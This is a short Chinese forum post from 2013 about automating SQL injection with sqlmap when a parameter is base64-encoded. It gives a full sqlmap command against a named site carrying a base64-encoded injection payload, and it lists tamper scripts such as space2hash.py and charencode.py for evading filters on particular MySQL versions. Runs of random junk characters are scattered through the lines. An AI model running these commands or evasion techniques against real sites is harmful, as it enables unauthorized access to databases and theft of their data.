WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?. G9 d3 o: H5 b% m
# Q% I2 ^8 m' ~
sqlmap的tamper里有个base64encode.py
0 f0 Y; s9 e1 y; T- m
7 Z. ~/ K, a' J, [% L; ?; M( x使用如下# [9 N7 N) i. E( m/ A: E
2 N. e! ^1 g- w/ T4 d* C; S9 @3 i9 j1 usqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
# b" ]8 l' ]* a- m& E) Z
: F- ?+ _; p* r6 A# G( E' z# C* d
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”* C1 Z, A9 U$ L0 b$ N
3 o, i0 r: I8 g) o5 ~其中常用到的bypass脚本绕过SQLMAP主要两个脚本:, h. X' F& y* @0 w# b. v0 i) {
4 K4 J z: G6 Z3 [' L( \$ [$ Lspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入
. s/ j/ |. S/ S# e# D* o3 V! |- dspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入/ }8 a6 d/ j6 x+ {0 y
首先确定目标数据库版本,然后选择相应的脚本。
8 A, O% h- p! j( u-v 3 --batch --tamper "space2hash.py"
5 E/ C/ O4 e8 ^! Z3 |! A0 y& |) N3 M
还有其他一些插件:
1 V9 B* [' @5 Q% a5 y" N9 {3 X, Oencodes编码 ——charencode.py
$ G7 c8 o5 V1 F6 H5 ^1 Nbase64编码 —— base64encode.py
; e4 \' L! o2 i替换空格和关键字 —— halfversionedmorekeywords.py! }0 S" X& R s$ t/ m8 c/ q2 O( b
|
7 V/ k/ Q9 k# n# r' V) Y
8 _- `' L) t" I: O' s) r7 C
* p3 | U3 Q4 k4 {
7 J8 O* z" u% ^! ^ |
发表于 2013-11-23 15:50:45
收藏
支持
反对